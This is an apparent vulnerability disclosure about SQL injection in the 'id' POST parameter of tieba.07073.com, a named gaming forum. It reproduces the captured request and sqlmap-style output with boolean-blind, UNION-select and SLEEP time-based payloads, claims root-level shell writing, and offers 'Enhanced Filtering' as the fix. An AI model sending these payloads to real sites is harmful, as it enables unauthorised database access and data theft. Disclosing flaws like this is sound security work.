07073 game network root injection: All websites have 5 k tables, and hundreds of databases can be written to shell 1.
Website tieba1_7073.com
POST /home/ready/ HTTP/1.1Host: tieba.07073.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://tieba.07073.com/frs-21909009Content-Length: 16Cookie: DedeUserID=xxxx; DedeUserID__ckMd5=xxx; DedeUsername=xxxx; DedeUsername__ckMd5=29ec97370246d59c; loginState=1; loginName=xxxx; PHPSESSID=xxx; bdshare_firstime=1421069405393; CNZZDATA30095910=cnzz_eid%3D847831538-1421067785-%26ntime%3D1421073185; CNZZDATA30080746=cnzz_eid%3D1542701307-1421067688-%26ntime%3D1421073178Connection: keep-alivePragma: no-cacheCache-Control: no-cacheid=13921
Place: POSTParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13925 AND 1798=1798 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: id=-3703 UNION ALL SELECT CONCAT(0x3a6366773a,0x4d514f56734165546247,0x3a7874643a)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=13925 AND SLEEP(5)---[23:10:27] [INFO] the back-end DBMS is MySQL
Solution:
Enhanced Filtering